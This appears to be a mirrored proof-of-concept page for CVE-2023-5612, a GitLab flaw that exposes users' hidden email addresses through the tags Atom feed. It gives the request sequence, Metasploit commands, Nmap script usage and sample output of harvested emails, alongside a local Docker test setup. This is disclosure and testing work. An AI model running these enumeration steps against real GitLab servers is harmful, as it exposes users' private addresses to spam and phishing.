Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-5612 PoC — Missing Authorization in GitLab

Source
https://github.com/mad3E7cat/CVE-2023-5612
Associated Vulnerability
Title:Missing Authorization in GitLab (CVE-2023-5612)
Description:An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
Description
Nmap NSE to check for CVE-2023-5612
Readme
# Disclosure of the public email in Tags RSS Feed

https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). It is now mitigated in the latest release and is assigned CVE-2023-5612.
```
https://nvd.nist.gov/vuln/detail/CVE-2023-5612
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
```

## Описание
В GitLab обнаружена уязвимость, позволяющая получить список почт пользователей (и имен), даже если некоторые пользователи имеют скрытый профиль. Это происходит из-за возможности неаутентифицированно получить доступ к эндпоинту `/api/v4/projects`. Для каждого проекта можно взять `web_url`, и отправить запрос на эндпоинт `/-/tags?format=atom`, получив в ответ xml в котором, в том числе, будет видно имя и почту пользователя:
```xml
...
    <name>test</name>
    <email>test@test.com</email>
...
```


## NSE Dev
PoC: 
- https://hackerone.com/reports/2208790
- https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
- https://sploitus.com/?query=CVE-2023-5612#exploits

**Обратить внимание**: есть [nse-скрипт](https://github.com/TopskiyPavelQwertyGang/Review.CVE-2023-5612) для якобы этой уязвы, но если обратить внимание на его название и содержание - становится ясно, что это ошибка и он не касается данной CVE.

#### Алгоритм: 
1. Получить названия всех доступных проектов:
```http
GET /api/v4/projects?output_mode=json HTTP/1.1
```
Пример ответа:
```json
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
```

2. Для каждого получить тэги в atom-xml формате:
```
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1
```
Пример ответа:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
  <id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
  <link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
  <title>1.0.0</title>
  <summary></summary>
  <content type="html"></content>
  <media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&amp;d=identicon"/>
  <author>
    <name>test</name>
    <email>test@test.com</email>
  </author>
</entry>
</feed>
```
в этом файле мы видим поля `name`, `email` всех авторов тегов в данном проекте. Их раскрытие атакующему и есть суть уязвимости. 

Пример успешной эксплуатации:
```bash
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run
```
Результат:
```bash
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: test@test.com
[+] name: Administrator
[+] e-mail: admin@example.com
[*] Auxiliary module execution completed
```

## NSE Test
Проверка производилась на `GitLab CE 16.5.10`
#### `docker-compose.yml`
```yaml
services:
  gitlab:
    image: gitlab/gitlab-ce:16.5.10-ce.0
    container_name: gitlab-ce
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://localhost:8929'
        gitlab_rails['gitlab_shell_ssh_port'] = 2424
    ports:
      - '8929:8929'
      - '443:443'
      - '2424:22'
    volumes:
      - '$GITLAB_HOME/config:/etc/gitlab'
      - '$GITLAB_HOME/logs:/var/log/gitlab'
      - '$GITLAB_HOME/data:/var/opt/gitlab'
    shm_size: '256m'
```
#### Launch && prepare test env
1. Поднять уязвимый `gitlab-ce` в docker:
```bash
sudo docker compose up
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# Do not decode the showed base64 value, just use it as is
# Change root's creds to smth like root:toortoor
```

2. Подготовить его:
- войти как root
- создать проект
- создать тэг для проекта от имени `root`
- создать польщователя `test`, войти как `test`
- создать проект от имени `test`
- создать тэг для проекта от имени `test`

2. Запустить скрипт: 
```bash
# full scan
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# fast scan
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast
```

Пример успешной эксплутации:
```bash
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
        http://localhost:8929/test/project3
        http://localhost:8929/testgroup/project2
        http://localhost:8929/root/test
[+] Results:
        email,username,project_url
        test@test.com,test,http://localhost:8929/test/project3
        admin@example.com,Administrator,http://localhost:8929/testgroup/project2
        admin@example.com,Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################

Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
8929/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# view saved results, show only emails
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
admin@example.com
test@test.com
```

Пример НЕ-успешной эксплуатации на примере не GitLab:
```bash
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
```

Пример эксплуатции на реальной НЕ-уязвимой цели:
```bash
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################
```

## Links
- https://vuldb.com/?id.252096
- https://hackerone.com/reports/2208790
- https://www.rapid7.com/db/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure/
- https://scm.cms.hu-berlin.de/safeguarding/cvelistV5/-/blob/cve_2025-05-08_0800Z/cves/2023/5xxx/CVE-2023-5612.json
- https://docs.gitlab.com/install/docker/installation/
- https://hub.docker.com/r/gitlab/gitlab-ce/tags/?page=4
- https://hub.docker.com/layers/gitlab/gitlab-ce/16.5.10-ce.0/images/sha256-a8a3b7904bb5f92b7fd55e924d65c08aac1999ba5a2670f17c00472918ae6f42
- https://cve.akaoma.com/cve-2023-5612
File Snapshot

 [4.0K]  /data/pocs/29db85d6c703938e34a50e5807aac4a4a6023549
├── [7.8K]  cve-2023-5612.nse
├── [ 523]  docker-compose.yml
└── [ 11K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →